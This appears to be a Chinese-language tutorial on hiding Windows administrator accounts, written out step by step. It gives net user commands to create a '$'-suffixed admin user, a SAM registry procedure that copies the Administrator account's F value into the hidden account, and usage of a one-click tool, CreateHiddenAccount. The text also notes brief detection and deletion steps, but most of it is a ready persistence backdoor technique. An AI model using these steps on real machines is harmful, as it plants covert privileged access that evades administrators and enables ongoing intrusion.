方法一: 用户名后面加$符号
net user test$ password /add net localgroup administrators test$ /add
此时使用命令net user 查看不到此用户,但使用 wmic命令可以
wmic useraccount get Name
此外,在控制面板也能看到此用户
可直接用命令删除
net user test$ /del
对于此方法,微软官方的回答是
方法二:修改注册表
前提是我们要基于方法一创建一个带$的账户。
win + r ,输入 regedit 打开注册表。路径为:HKEY_LOCAL_MARCHINE\SAM\SAM
默认情况下只有 system用户组 有控制注册表的权限。administrators组没有任何权限。system组是administrator组更高一级的存在,它拥有和administrator组一样甚至更高级的权限。查看用户组时不会显示,也不允许任何账户加入。存在目的是保证系统服务的运行,因此被赋予系统及系统级的权限。
此时打开SAM文件夹是不会显示下面的文件的。我们 右击SAM ,点击权限
赋予administrators组权限
点击应用-->确定。重新打开注册表。此时即可看见SAM的文件内容
此时我们要导出
-
user下的administrator的隐藏文件,即 1F4
-
user/name 下test$账户的文件
-
user下的 test$ 账户的隐藏文件,在name下看到对应的是 3EC
右键导出即可。
用记事本打开1和3,将 administrator注册表文件中的F值覆盖到 test$账户的隐藏文件中去
保存后,删除 test$用户。
net user test$ /del
再双击test的两个注册表文件,将用户再次添加。
此时net user 和控制面板看不到 test$
但 net user test$ 能看到此用户,
注册表和 wmic useraccount get Name 也能看到
而且当电脑重启后,在计算机管理里也能看到刚刚创建的隐藏账号。
工具
项目地址:https://github.com/wgpsec/CreateHiddenAccount
使用方法
管理员权限运行 CreateHiddenAccount_v0.2.exe -c 检查是否有隐藏账户 CreateHiddenAccount_v0.2.exe -u test -p 123 创建名为test,密码为123的账户。会自动补上$ CreateHiddenAccount_v0.2.exe -d test$ 删除隐藏账户
原帖地址:一键创建隐藏账号